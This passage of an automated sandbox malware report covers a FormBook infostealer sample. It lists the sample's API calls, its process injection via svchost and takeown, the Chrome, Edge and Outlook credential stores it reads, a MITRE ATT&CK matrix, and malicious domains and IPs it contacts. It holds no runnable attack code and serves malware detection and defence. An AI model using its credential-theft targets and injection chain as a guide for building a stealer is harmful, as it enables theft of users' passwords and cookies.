                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FE874B
                Source: arGdXDmyGJ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: arGdXDmyGJ.exe, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB862B cpuid 0_2_00FB862B
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FC4E87
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FD1E06 GetUserNameW,0_2_00FD1E06
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FC3F3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F949A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_81
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_XP
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_XPe
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_VISTA
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_7
                Source: arGdXDmyGJ.exeBinary or memory string: WIN_8
                Source: arGdXDmyGJ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01006283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01006283
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_01006747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01006747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets251
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634891 Sample: arGdXDmyGJ.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 28 www.dolfisstillspinnin.xyz 2->28 30 www.sislieskort.xyz 2->30 32 8 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 arGdXDmyGJ.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 DKwZ8oxmXrzaXEMk9aGP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 takeown.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 DKwZ8oxmXrzaXEMk9aGP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 kakeksakti43.cfd 198.252.98.84, 49720, 49721, 49722 HAWKHOSTCA Canada 22->34 36 nan21.net 93.113.54.70, 49700, 49701, 49702 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.